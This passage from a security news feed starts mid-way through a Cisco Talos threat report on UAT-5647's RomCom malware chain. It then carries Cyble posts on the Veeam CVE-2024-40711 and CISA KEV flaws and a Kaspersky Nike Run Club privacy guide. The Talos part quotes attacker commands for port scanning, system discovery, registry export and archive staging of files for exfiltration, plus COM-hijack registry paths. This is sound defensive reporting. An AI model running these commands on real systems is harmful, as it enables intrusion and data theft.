powershell -c $ips = @(“<IP_ADDRESS>”); $ports = @(“22”, “80”, “443”); foreach ($ip in $ips) { foreach ($port in $ports) { if ((New-Object Net[.]Sockets[.]TcpClient)[.]Connect($ip, $port)) { “$[OPEN] $ip $port” | Out-File -Append “c:userspublicmusiclog[.]txt” } } }

Later the threat actor expanded their port scans to other IP address in the network: 

powershell -Command $ips = @(” <IP_ADDRESS>”, “<IP_ADDRESS>”, …., “<IP_ADDRESS>”, “<IP_ADDRESS>”); $ports = @(“22”, “80”, “443”, “445”); $output = “c:userspublicmusiclog[.]txt”; foreach ($ip in $ips) { foreach ($port in $ports) { $result = Test-NetConnection -ComputerName $ip Port $port; “$ip $port : $($result[.]TcpTestSucceeded)” | OutFile Append $output } }

System and user discovery 

Even though the C2 may have automatically issued a limited set of commands to the last-stage implants, the attackers open a reverse shell (via cmd[.]exe) to conduct further reconnaissance. This activity primarily consists of user and system discovery tasks:

Commands 

MITRE ATT&CK Technique 

 

whoami 

whoami /all 

 

System Owner/User Discovery [T1003] 

 

 

chcp 

 

System Location Discovery: System Language Discovery [T1614/001] 

 

systeminfo 

ipconfig /all 

powershell -c get-volume 

tasklist 

arp -a 

net user 

tasklist /v 

netstat –ano 

 

 

 

System Information Discovery [T1082] 

 

nltest /domain_trusts 

 

 

Domain Trust Discovery [T1482] 

 

dir C:Program Files 

dir C:Users 

dir %userprofile% 

dir %userprofile%Downloads 

dir %userprofile%Desktop 

dir %userprofile%Documents 

dir %localappdata% 

dir /s C:ProgramData 

dir %LOCALAPPDATA%GoogleChromeUser DataDefault 

dir %localappdata% 

dir c:users 

dir %public% 

 

 

 

 

 

File and Directory Discovery [T1083] 

net localgroup 

net localgroup administrators 

net share 

 

Permission Groups Discovery: Local Groups [T1069/001] 

 

cmd /C reg export hkcu %public%musichkcu.txt 

cmd /C reg export hklm %public%pictureshklm.txt 

cmd /C reg query hklmsoftware 

cmd /C reg query hklmsoftware<product_name> 

cmd /C reg query hklmSYSTEMCurrentControlSetServices <product_name> /s 

 

Query Registry [T1012] 

Data exfiltration activity 

In parallel, we also observed the operators attempting to stage entire drives for exfiltration from the infected system [T1560]: 

powershell -c Compress-Archive -Path d: -DestinationPath C:Users<user>Documentsd.zip

However, they also collected specific folders on disk too. In this specific case the threat actor is exfiltrating the “Recent” folder in, what seems, an attempt to understand the victim’s latest activity on the system. 

cmd /C powershell -c Compress-Archive -Path c:users<users>appdataRoamingmicrosoftWindowsRecent -DestinationPath c:userspublicmusicrecent.zip

RustyClaw leads to DustyHammock 

RustyClaw is a RUST-based malware downloader that is targeted towards Polish, Ukrainian or Russian speaking users. The malware checks the Keyboard Layout to match one of the following language codes, before proceeding with its malicious activities: 

415 – Polish 422 – Ukrainian 419 – Russian 2000 – Unknown 

 

RustyClaw will then generate a hash for its file name to match it with a hardcoded value – this is an anti-analysis feature to prevent malware from running in sandboxes with randomized names. 

Once the checks have passed, the downloader will optionally download a decoy PDF to display to the infected user and then download the next-stage implant, DustyHammock, to locations on disk such as: 

C:Users<user>AppDataLocalKeyStorekeyprov.dll 

Then the following registry values are set to the path of the next-stage payload (keyprov[.]dll): 

HKCUSOFTWAREClassesCLSID{2155fee3-2419-4373-b102-6843707eb41f}InprocServer32 

This GUID is the CLISD for “CLSID_LocalIconCache”, that is the ThumbCache entry. It is used by explorer[.]exe while rendering the thumbnails for file icons. 

The downloader will then restart the explorer[.]exe process to load the next-stage payload DLL, DustyHammock, effectively trojanizing the process: 

cmd /C timeout 3 && taskkill /f /im explorer.exe && start explorer.exe 

DustyHammock – UAT-5647’s latest backdoor 

DustyHammock is another RUST-based backdoor. It is configured to run preliminary, hardcoded, reconnaissance commands on the infected system, gather their outputs, and send the information to its C2. The C2 then begins responding with tasks to perform on the infected system. The preliminary information collected is the MAC addresses, windows version information, and computerusername via the “whoami” and “chcp” commands. 

The backdoor has the following capabilities: 

Run arbitrary commands on the infected endpoint. Download and place files from the C2 to the infected system. Connect to an IPNS CID – likely done to download additional payloads to the infected system. The CID access by the backdoor is “/ipns/k51qzi5uqu5dgn9wgsaxb7cfvinmk27eusoufaxrp8qd1ri5kamf41bg7gpydm”. 

InterPlanetary File System (IPFS) is a peer-to-peer network allowing resource hosting in a decentralized manner. InterPlanetary Name System (IPNS), a feature of IPFS, enables mutable referencing of resources hosted on IPFS networks, allowing uploaders to modify the content of the resource without changing its identifier (CID). 

 Note that although similar in names, DustyHammock and ShadyHammock are in fact distinct implant families. ShadyHammock is coded in C++ and contains additional capabilities to bind itself and listen for incoming requests – a capability missing in DustyHammock. Although ShadyHammock consists of more features, DustyHammock seems to be the successor to it and was used as recently as September 2024 by UAT-5647. UAT-5647 likely decided to abandon additional components such as SingleCamper (loaded by ShadyHammock) in favor of a single last-stage implant, DustyHammock. 

MeltingClaw leads to ShadyHammock 

MeltingClaw is the second malware downloader UAT-5647 has used in this series of attacks. It is similar in behavior to RustyClaw with varying configurations such as file names and locations. The next-stage payload, ShadyHammock, is dropped to a similar location such as: 

C:Users<user>AppDataLocalAppTemplibapi.dll 

 

This DLL is loaded into explorer[.]exe by specifying it in the registry key: 

HKEY_USERSS-1-..-CLASSESCLSID{F82B4EF1-93A9-4DDE-8015-F7950A1A6E31}InprocServer32 

This GUID is the “Sync Registration” COM interface and is loaded into explorer[.]exe as well. 

 Apart from these capabilities that are common with RustyClaw, MeltingClaw will also download and store additional payloads in the Windows registry: 

HKEY_CURRENT_USERSoftwareAppDataSoftSoftware 

 

Registry Value Names 

Purpose and contents 

state1 

trem1 

XOR encoded SingleCamper DLL 

state2 

trem2 

XOR encoded malware DLL – currently unknow. 

state3 

trem3 

The implant version for the downloader. 
“UPDE<number>” 

 

These payloads are then loaded and activated by ShadyHammock via explorer[.]exe as illustrated next. One of the payloads is a new variant of the RomCom backdoor, we track as “SingleCamper”. The other payload is currently unknown. 

ShadyHammock – a two-pronged backdoor 

ShadyHammock is a simple and effective backdoor that carries out two primary tasks: 

Load and run payloads placed in certain registry locations (by its parent MeltingClaw). Bind to localhost and listen for incoming commands from a separate malicious component. 

 

ShadyHammock’s load-and-run capability leads to SingleCamper 

The malware will read registry locations, specifically in location: 

HKEY_CURRENT_USERSoftwareAppDataSoftSoftware 

There are usually three values in this registry key, two containing encoded copies of next stage payloads and the third containing configuration specific data such as the implant’s versions. 

The binary content of these registry values is read and decoded, resulting in a DLL that is simply traversed to find the export function. The resulting DLLs are loaded into memory to carry out more malicious activities. So far Talos has only discovered one DLL-based payload from registry, that we track as “SingleCamper”. SingleCamper, a new version of the RomCom malware, was also recently disclosed in Palo Alto’s report as SnipBot.  

The other payload is yet to be discovered (usually in the “trem2” or “state2” registry values). However, ShadyHammock already has the capability to deploy this payload on-demand provided that a specific command code is sent to it via the endpoint’s localhost interface. 

 

ShadyHammock can accept commands from SingleCamper 

ShadyHammock also consists of the ability to bind to a specific port (such as 1342) on localhost (127[.]0[.]0[.]1). Binding to localhost does not allow it to listen for incoming requests from remote hosts and is a mechanism to communicate with SingleCamper. 

 

 

ShadyHammock listening on Port 1342 

 

ShadyHammock will listen for specific command phrases based on which it performs specific actions. These actions consist of: 

delete bot”: Issuing this command will result in the backdoor being deleted from the infected host. The backdoor will delete all registry keys and folders associated with it and then restart explorer[.]exe to execute a benign, non-trojanized copy of the process. “update bot work” or “start bot file”: these commands instruct the backdoor to decode and load the payload stored in the second registry value that may have been created by MeltingClaw – “trem2” or “state2”. 

These commands are in fact issued to ShadyHammock by SingleCamper (RomCom). SingleCamper’s C2 server will issue a specific command code to it based on which the malware will generate the command phrase such as “delete bot” and send it to ShadyHammock via the localhost interface. 

 

SingleCamper issuing commands to ShadyHammock via localhost 

 

SingleCamper – an update to RomCom 

SingleCamper is the key implant in this infection that carries out all of the malicious post-compromise activities. It is loaded by ShadyHammock after being read and decoded from the Windows registry. 

SingleCamper consists of the following capabilities: 

Send preliminary system information to the C2 for registering the infection. The data is sent over Port 443  (HTTPS) in format: 

<MAC_ADDRESS>@RDPE1@@exist:<BLAH>-0:US:RDPE1::<OEM_CP_VALUE>: 

Execute preliminary reconnaissance commands sent by the C2 and respond with the results such as: nltest /domain_trusts systeminfo ipconfig /all dir C:”program Files” C:”Program Files (x86)” C:Users 

 

Based on the information received by the C2, the attackers decided whether the infected system is worth exploring further and carrying out post-compromise activities. Therefore, any commands executed by SingleCamper after these preliminary commands may be human operator issued commands. 

Receive command codes and accompanying data from the C2 and perform malicious actions on the infected system such as system information, download of additional payloads (such as PuTTY’s Plink), enumerate processes, enumerate and exfiltrate files with specific extensions such as: txt, rtf, xls, xlsx, ods, cmd, pdf, vbs, ps1, one, kdb, kdbx, doc, docx, odt, eml, msg, email. 

SingleCamper can also send commands to its loader, ShadyHammock, to perform actions on the infected endpoint. Actions include deleting the infection and loading another payload from registry – the same way ShadyHammock loads SingleCamper. 

 

Coverage 

Ways our customers can detect and block this threat are listed below. 

 

 

 Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.  

 Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.  

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.  

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.  

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.  

Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.  

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.  

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.  

 Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.  

 Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.  

 

 

 

IOCs 

 

IOCs for this research can also be found at our GitHub repository here

 

RustyClaw 

12bf973b503296da400fd6f9e3a4c688f14d56ce82ffcfa9edddd7e4b6b93ba9 
260a6644ab63f392d090853ccd7c4d927aba3845ced473e13741152cdf274bbd 
9062d0f5f788bec4b487faf5f9b4bb450557e178ba114324ef7056a22b3fbe8b 
43a15c4ee10787997682b79a54ac49a90d26a126f5eeeb8569022850a2b96057 
aa09e9dca4994404a5f654be2a051c46f8799b0e987bcefef2b52412ac402105 
585ed48d4c0289ce66db669393889482ec29236dc3d04827604cf778c79fda36 
62f59766e62c7bd519621ba74f4d0ad122cca82179d022596b38bd76c7a430c4 
9fd5dee828c69e190e46763b818b1a14f147d1469dc577a99b759403a9dadf04 
b1fe8fbbb0b6de0f1dcd4146d674a71c511488a9eb4538689294bd782df040df 
7602e2c1ae27e1b36ee4aed357e505f14496f63db29fb4fcdd0d8a9db067a5c4 
f3fe04a7e8da68dc05acb7164b402ffc6675a478972cf624de84b3e2e4945b93 
10e1d453d4f9ca05ff6af3dcd7766a17ca1470ee89ba90feee5d52f8d2b18a4c 
a265ae8fed205efb5bcc2fb59e60f743f45b7ad402cb827bc98dee397069830c 
8104fdf9ff6be096b7e5011e362400ee8dd89d829c608be21eb1de959404b4b9 
b55f70467f13fbad6dde354d8653d1d6180788569496a50b06f2ece1f57a5e91 
bd25618f382fc032016e8c9bc61f0bc24993a06baf925d987dcec4881108ea2a 
78eaaf3d831df27a5bc4377536e73606cd84a89ea2da725f5d381536d5d920d8 
88a4b39fb0466ef9af2dcd49139eaff18309b32231a762b57ff9f778cc3d2dd7 
01ebc558aa7028723bebd8301fd110d01cbd66d9a8b04685afd4f04f76e7b80c 
7c9775b0f44419207b02e531c357fe02f5856c17dbd88b3f32ec748047014df8 
54ce280ec0f086d89ee338029f12cef8e1297ee740af76dda245a08cb91bab4d 
bf5f2bdc3d2acbfb218192710c8d27133bf51c1da1a778244617d3ba9c20e6f7 
fdbc6648c6f922ffcd2b351791099e893e183680fc86f48bf18815d8ae98a4f7 
ac9e3bf1cc87bc86318b258498572793d9fb082417e3f2ff17050cf6ec1d0bb5 
0a02901d364dc9d70b8fcdc8a2ec120b14f3c393186f99e2e4c5317db1edc889

 

DustyHammock 

951b89f25f7d8be0619b1dfdcc63939b0792b63fa34ebfa9010f0055d009a2d3 

 

PuTTY Plink 

2e338a447b4ceaa00b99d742194d174243ca82830a03149028f9713d71fe9aab 

 

MeltingClaw 

45adf6f32f9b3c398ee27f02427a55bb3df74687e378edcb7e23caf6a6f7bf2a 
B9677c50b20a1ed951962edcb593cce5f1ed9c742bc7bff827a6fc420202b045

 

ShadyHammock 

ce8b46370fd72d7684ad6ade16f868ac19f03b85e35317025511d6eeee288c64 
9f635fa106dbe7181b4162266379703b3fdf53408e5b8faa6aeee08f1965d3a2 
1fa96e7f3c26743295a6af7917837c98c1d6ac0da30a804fed820daace6f90b0

 

SingleCamper 

dee849e0170184d3773077a9e7ce63d2b767bb19e85441d9c55ee44d6f129df9
2474a6c6b3df3f1ac4eadcb8b2c70db289c066ec4b284ac632354e9dbe488e4d

 

 

Network IOCs 

213[.]139[.]205[.]23 
dnsresolver[.]online 
apisolving[.]com 
hxxp[://]apisolving[.]com:443/DKgitTDJfiP 
rdcservice[.]org 
23[.]94[.]207[.]116 
webtimeapi[.]com 
91[.]92[.]242[.]87 
wirelesszone[.]top 
hxxp[://]wirelesszone[.]top:433/OfjdDebdjas 
192[.]227[.]190[.]127 
devhubs[.]dev 
91[.]92[.]254[.]218 
pos-st[.]top 
hxxp[://]adcreative[.]pictures:443/kjLY1Ul8IMO 
adcreative[.]pictures 
91[.]92[.]248[.]75 
creativeadb[.]com 
94[.]156[.]68[.]216 
hxxp[://]creativeadb[.]com:443/n9JTcP62OvC 
193[.]42[.]36[.]131 
copdaemi[.]top 
adbefnts[.]dev 
23[.]137[.]253[.]43 
store-images[.]org 
193[.]42[.]36[.]132 
/ipns/k51qzi5uqu5dgn9wgsaxb7cfvinmk27eusoufaxrp8qd1ri5kamf41bg7gpydm

Cisco Talos Blog – ​Read More

Critical Vulnerability in Veeam Products Exploited by Ransomware Gangs

/in

Key Takeaways


A critical vulnerability, CVE-2024-40711, was discovered in Veeam Backup & Replication, allowing unauthenticated remote code execution.

CVE-2024-40711 has a CVSS score of 9.8, indicating an urgent need for remediation due to its severity.

 Threat actors are actively exploiting this vulnerability to deploy Akira and Fog ransomware.

Veeam issued security updates to address these vulnerabilities in early September 2024.

Multiple Veeam products were also affected by different vulnerabilities, including Veeam Backup & Replication, Veeam ONE, and Veeam Agent for Linux, among others.

Organizations are urged to implement regular update protocols, enhance monitoring, and develop incident response plans to mitigate risks.

Overview

Threat actors have exploited a recent critical vulnerability in Veeam Backup & Replication to deploy Akira and Fog ransomware. This vulnerability, designated as CVE-2024-40711, is rated 9.8 out of 10.0 on the Common Vulnerability Scoring System (CVSS) scale, highlighting its severe nature. Veeam addressed this security flaw in version 12.2 of Backup & Replication, released in early September 2024.

Florian Hauser, a security researcher with CODE WHITE based in Germany, discovered the vulnerability and reported it to Veeam. Hauser emphasized the urgency of patching systems, stating, “Better patch your Veeam Backup & Replication servers! Full system takeover via CVE-2024-40711, discovered by our very own @frycos—no technical details from us this time because this might instantly be abused by ransomware gangs.”

The exploitation of this vulnerability has raised security concerns. In a recent attack linked to the Fog ransomware, threat actors managed to deploy the ransomware on an unprotected Hyper-V server. During the same operation, they utilized the rclone utility to exfiltrate sensitive data.

However, other attempts to deploy ransomware were reportedly unsuccessful. Attempted exploits picked up by Sophos endpoint detection all used compromised VPN gateways lacking multifactor authentication (MFA) to exploit Veeam on the widely exposed port 8000, triggering the Veeam.Backup.MountService.exe to launch net.exe. The exploit creates a local account, “point,” and adds it to the local Administrators and Remote Desktop Users groups.

Timely Patches and Advisory

Veeam took prompt action by disclosing the vulnerability and releasing security updates on September 4, 2024. Following this, watchTowr Labs published a technical analysis of the vulnerabilities on September 9, 2024.

Notably, they delayed the publication of proof-of-concept exploit code until September 15, 2024, to give administrators adequate time to secure their systems. Given its widespread use, Veeam’s products are a prime target for malicious actors looking for quick access to backup data, emphasizing the need for timely remediation.

Moreover, according to an advisory from Cyble, CVE-2024-40711 is just one of several vulnerabilities that affected Veeam products. The Cyble advisory released a summary of the latest vulnerabilities and patches from various vendors, focusing on the following CVEs linked to Veeam:


CVE-2024-40711: Critical, CVSS score 9.8, allowing unauthenticated remote code execution.

CVE-2024-40713: High severity.

CVE-2024-40710: High severity.

CVE-2024-39718: Medium severity.

CVE-2024-40714: High severity.

CVE-2024-40712: Medium severity.

CVE-2024-40709: Medium severity.

CVE-2024-42024: Medium severity.

CVE-2024-42019: Medium severity.

CVE-2024-42023: Medium severity.

CVE-2024-42021: Medium severity.

CVE-2024-42022: Medium severity.

CVE-2024-42020: Medium severity.

CVE-2024-38650: Medium severity.

CVE-2024-39714: Medium severity.

CVE-2024-39715: Medium severity.

CVE-2024-38651: Medium severity.

CVE-2024-40718: Medium severity.

The vulnerabilities primarily impact several Veeam products, posing significant security risks. Among these is Veeam Backup & Replication, which is widely used for data protection and disaster recovery. Additionally, the Veeam Agent for Linux is affected, as well as Veeam ONE, which provides monitoring and analytics for backup operations.

Furthermore, the Veeam Service Provider Console is included in the list of vulnerable products, along with Veeam Backup for Nutanix AHV. Lastly, Veeam Backup for Oracle Linux Virtualization Manager and Red Hat Virtualization also face these security concerns. Organizations utilizing any of these products should take immediate action to secure their systems against potential exploitation. 

Technical Details of CVE-2024-40711

CVE-2024-40711 is classified as a remote code execution vulnerability, allowing unauthenticated attackers to send a malicious payload that can lead to a complete system takeover. The affected software versions include Veeam Backup & Replication 12.1.2.172 and all earlier versions.

During an investigation, Cyble’s ODIN scanner identified approximately 2,466 internet-exposed instances of Veeam Backup, predominantly in the United States. 

The CVE-2024-40711 vulnerability is not an isolated incident. On March 7, 2023, Veeam patched another high-severity vulnerability, CVE-2023-27532, which was exploited in attacks linked to the financially motivated FIN7 threat group, notorious for its connections to various ransomware operations including Conti, REvil, Maze, Egregor, and BlackBasta. 

Recommendations and Mitigations

Here are several mitigation and recommendation strategies for addressing the vulnerabilities in Veeam products:


Ensure that the latest patches released by Veeam are implemented immediately to address the critical vulnerabilities.

Create a routine schedule for regular updates across all Veeam products to maintain security and compliance.

Regularly perform security assessments and audits to identify and remediate potential vulnerabilities in your systems.

Isolate Veeam products from the internet wherever possible to reduce the attack surface and minimize exposure to potential threats.

Enforce MFA for accessing Veeam management interfaces to add an additional layer of security against unauthorized access.

Utilize comprehensive monitoring tools to detect suspicious activities and potential exploitation attempts in real-time.

Establish and regularly update an incident response plan that includes procedures for identifying, responding to, and recovering from security incidents.

Assess any third-party tools or integrations used with Veeam products to ensure they do not introduce additional vulnerabilities.

Conclusion

Veeam’s products, used by over 550,000 customers globally, including 74% of the Global 2000 companies, represent a dangerous risk if not properly secured. Organizations relying on Veeam’s Backup & Replication solutions must act swiftly to apply the necessary patches and protect their defenses against potential ransomware attacks. 

The post Critical Vulnerability in Veeam Products Exploited by Ransomware Gangs appeared first on Cyble.

Blog – Cyble – ​Read More

Protecting major events: An incident response blueprint

/in

Ensuring the cybersecurity of major events — whether it’s sports, professional conferences, expos, inter-government meetings or other gatherings — is a complex and time-intensive task.  

It requires a comprehensive approach and collaboration among various stakeholders, including vendors, hospitality teams, and service providers, to establish a consistent cybersecurity strategy across the entire event ecosystem. 

In our latest version of the “Protecting major events: An incident response blueprint” whitepaper, Cisco Talos Incident Response outlines the essential steps organizations should take to secure any major event. This paper highlights 13 critical focus areas that will guide organizing committees and participating businesses, offering key questions and actionable answers to help ensure robust event security. 

A Talos IR blueprint for protecting major events
Learn from Talos IR experts’ experience about what organizations need to consider.
protecting-major-events.pdf
1 MB
download-circle

Cisco Talos Blog – ​Read More

CISA Issues Urgent Advisory on Vulnerabilities Affecting Multiple Products

/in

Overview

The Cybersecurity and Infrastructure Security Agency (CISA) has released a critical advisory report highlighting vulnerabilities recently added to the Known Exploited Vulnerability (KEV) catalog. These vulnerabilities pose risks to organizations and require immediate attention.

CISA categorizes vulnerabilities based on the Common Vulnerabilities and Exposures (CVE) naming standards and the Common Vulnerability Scoring System (CVSS). This system classifies vulnerabilities into high, medium, and low categories. High vulnerabilities are assigned scores ranging from 7.0 to 10.0; medium vulnerabilities receive scores between 4.0 and 6.9, and low vulnerabilities score between 0.0 and 3.9.

The advisory outlines specific vulnerabilities and the products they affect, including SolarWinds, Mozilla Firefox, and Microsoft Windows.

Vulnerability Details

One of the critical vulnerabilities identified is CVE-2024-28987, which affects the SolarWinds Web Help Desk (WHD) software, specifically version 12.8.3 HF1 and all earlier versions. This vulnerability is classified as critical, with a CVSS score of 9.1. It allows remote, unauthenticated users to access internal functionalities and modify data due to hardcoded credentials in the software.

Public proof-of-concept exploits for this vulnerability are readily available, highlighting its severity. According to Cyble’s ODIN scanner, approximately 920 internet-facing instances of SolarWinds WHD have been identified, primarily located in the United States.

Another vulnerability, CVE-2024-9680, affects multiple versions of Firefox and Thunderbird and has a critical CVSS score of 9.8. This vulnerability arises from a use-after-free flaw in Animation timelines, enabling an attacker to execute arbitrary code. Mozilla has acknowledged reports of this vulnerability being exploited in the wild, further emphasizing the need for immediate remediation.

The third vulnerability, CVE-2024-30088, impacts various Windows products, including Windows Server 2016 and multiple Windows 10 and 11 versions. It has a CVSS score of 7.0, classifying it as high severity. This vulnerability exploits a race condition within the Windows kernel, allowing attackers to gain SYSTEM privileges. Researchers from Trend Micro have reported observing the Advanced Persistent Threat (APT) group APT34 leveraging this vulnerability for privilege escalation in targeted systems.

Recommendations


Organizations should apply the latest patches from official vendors.

Establish a routine schedule for regularly updating all software and hardware systems.

Ensure critical updates are prioritized for immediate application to reduce exposure to exploits.

Isolate sensitive assets from less secure areas to minimize risk and reduce the attack surface.

Implement firewalls, Virtual Local Area Networks (VLANs), and access controls to limit threat exposure.

Develop and regularly update an incident response plan for detecting, responding to, and recovering from security incidents.

Conduct regular tests of the incident response plan to ensure its effectiveness against evolving threats.

Use comprehensive monitoring and logging solutions to detect and analyze suspicious activities across the network.

Utilize Security Information and Event Management (SIEM) systems for real-time threat detection and response by aggregating and correlating logs.

Proactively identify and plan for the timely upgrades or replacements of End-of-Life (EOL) products to mitigate associated risks.

Conclusion

The addition of these vulnerabilities to CISA’s KEV catalog highlights the urgent need for organizations to address them immediately. The fact that these vulnerabilities are actively exploited signifies that organizations with affected systems face heightened risks, including potential data breaches, ransomware attacks, and privilege escalation.

Organizations must promptly patch these vulnerabilities to safeguard their systems from malicious actors. By following these recommendations, organizations can significantly strengthen their cybersecurity and protect against critical vulnerabilities.

The post CISA Issues Urgent Advisory on Vulnerabilities Affecting Multiple Products appeared first on Cyble.

Blog – Cyble – ​Read More

Security and privacy settings in Nike Run Club | Kaspersky official blog

/in

We’ve talked before about why it’s crucial to configure your privacy settings in fitness apps before you even start using them, and shared a detailed guide on general smartphone settings to minimize data risks.

The fact is, fitness tracking apps share your sensitive information — including your precise location. Strava in particular stands out, since it shares almost all your training data by default. We’ve already covered how to set privacy in Strava in detail.

Other running apps have fewer privacy settings than Strava — and they are stricter by default (at least for new users signing up now). Nevertheless, it’s worth reviewing these settings as well, as there are a few things you might want to turn off.

The app of the world’s largest sportswear manufacturer — Nike Run Club (available for both Android and iOS) — tucks its privacy settings away in a not-so-obvious place. Here’s how to find them: in the top left corner, tap the gray round icon with your initials. Then, tap Settings. In the window that opens, you won’t find some “Privacy” section; instead, the relevant settings are scattered throughout.

Where to find privacy settings in the Nike Run Club app

Firstly, make sure your profile isn’t public: to do this, tap Profile Visibility, and check where the tick mark is. The best choice from a privacy perspective would be Friends (social), or even better, Only Me (private).

Secondly, prevent Nike from selling your data for “personalized advertising”. To do this, go to Your Privacy Choices and turn on the Do Not Share My Information toggle switch.

Thirdly, prevent Nike itself from using your data for internal purposes. To do this, go to the innocuously named Workout Info section and turn off the Use My Workout Info toggle switch.

Don’t overlook these key Nike Run Club settings

You may also want to look at Notifications Preference, Friend Tagging, and Friend Leaderboard. And if at some point you decide to quit Nike Run Club altogether, don’t forget to delete your profile by tapping Delete Account at the bottom of the settings list.

Using other running apps to track your workouts? We’ve got you covered with privacy guides for:

Strava
MapMyRun
adidas Running (formerly Runtastic)
ASICS Runkeeper

You can also find guides on setting up privacy in other apps — from social networks to browsers — on our website Privacy Checker.

And Kaspersky Premium will maximize your privacy and safeguard you from digital identity theft on all your devices.

Don’t forget to subscribe to our blog for more how-to guides and useful articles to always stay one step ahead of scammers.

Kaspersky official blog – ​Read More